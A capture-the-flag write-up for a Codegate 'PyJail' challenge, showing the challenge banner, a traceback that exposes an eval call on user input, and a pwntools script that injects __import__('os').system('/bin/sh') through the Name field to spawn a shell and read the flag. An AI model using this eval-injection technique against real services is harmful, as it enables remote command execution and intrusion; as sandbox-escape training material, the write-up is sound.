```
__
PyJail /__\
____________| |
|_|_|_|_|_|_| |
|_|_|_|_|_|_|__|
A@\|_|_|_|_|_|/@@Aa
aaA@@@@@@@@@@@@@@@@@@@aaaA
A@@@@@@@@@@@@@@@@@@@@@@@@@@A
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
[!] Rule
1. After 3 day, the Light will be Turned Off then you Cannot see anything.
2. Cannot Use Some Special Characters in PyJail.
3. For 10 days, You can enter 38 characters per day.

Can You Escape from Here ??

Name: whatever
[day-1]
################## Work List ##################
coworker : Find Coworker For Escape
tool : Find Any Tool
dig : Go Deep~
bomb : make boooooooomb!!!
###############################################
digg
Traceback (most recent call last):
File "/home/impel_down/Impel_Down.py", line 140, in <module>
result = eval("your."+work+"()")
File "<string>", line 1, in <module>
AttributeError: Esacpe_Player instance has no attribute 'digg'
```

Our Approach
result = eval("your."**dig(),[some trick],exit**"()")

also we assume that Name was saved into "**name**" variable

we can insert any python payload into **Name** then eval **name** variable in **result**

```
from pwn import *

a = remote("ch41l3ng3s.codegate.kr",2014)
print a.recvuntil("Name :")
a.sendline('__import__("os").system("/bin/sh")')
print a.recvuntil("###############################################")
a.sendline("dig(),eval(name),exit")
a.interactive()
```

Then we found file named FLAG in /
```
$ file /FLAG*
FLAG_FLAG_FLAG_LOLOLOLOLOLOL: executable, regular file, no read permission
$ /FLAG*
G00000000d !! :)
I think you are familiar with Python !
FLAG{Pyth0n J@il escape 1s always fun @nd exc1ting ! :)}
```